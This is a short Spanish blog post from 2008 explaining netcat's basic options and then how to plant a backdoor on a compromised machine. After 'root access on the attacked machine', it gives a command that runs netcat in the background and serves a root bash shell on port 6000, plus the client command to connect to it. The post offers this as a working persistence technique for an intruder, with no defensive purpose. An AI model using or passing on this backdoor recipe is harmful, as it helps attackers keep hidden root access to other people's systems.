Puerta trasera con Netcat

Publicado el 4 de Enero ,2008 por ekhtor

Netcat es un programa que su función a parte de ser simple puede resultar muy potente, lo que hace es crear un socket entre cliente y servidor y una vez conectados se envía todo lo que se escriba por su entrada estándar y escribe en su salida estándar todo lo que se reciba por el socket.

En resumen, puede servir de puente entre dos máquinas. Su sintáxis es la siguiente:

nc [-opciones] nombre_servidor puerto[s] [puertos]nc -l -p puerto [-opciones] [nombre_servidor] [puerto]

Y los parámetros básicos son:

* -l: modo ‘listen’, queda a la espera de conexiones entrantes.

* -p: puerto local

* -u: modo UDP

* -e: ejecuta el comando dado después de conectar

* -c: ejecuta órdenes de shell (hace /bin/sh -c [cadena] después de conectar

Sabiendo esto, una vez que tengamos acceso root en la máquina atacada, es muy fácil crear una puerta trasera (backdoor) con netcat. Simplemente escribiendo este comando:

# nc -l -e /bin/bash -p 6000&

Con el modo -l ponemos a la escucha a la máquina servidora y con -e ejecutamos una terminal de root cuando conecte el cliente, con -p indicamos el puerto y el & lo usamos para que todo el proceso se ejecute en background.
Ahora si queremos conectar con el servidor, en nuestro cliente tendremos que teclear lo siguiente:

nc ip_remota 6000

Si no recibimos ningún error, ya estaremos conectados a la máquina remota con una consola de root, con la única diferencia de que no se mostrará el prompt de la bash.

El programa netcat tiene muchas posibilidades asique dentro de poco colgaré un tutorial de netcat con todas sus posibilidades.

Compártelo

Entradas Relaccionadas

Publica un comentario

Comenta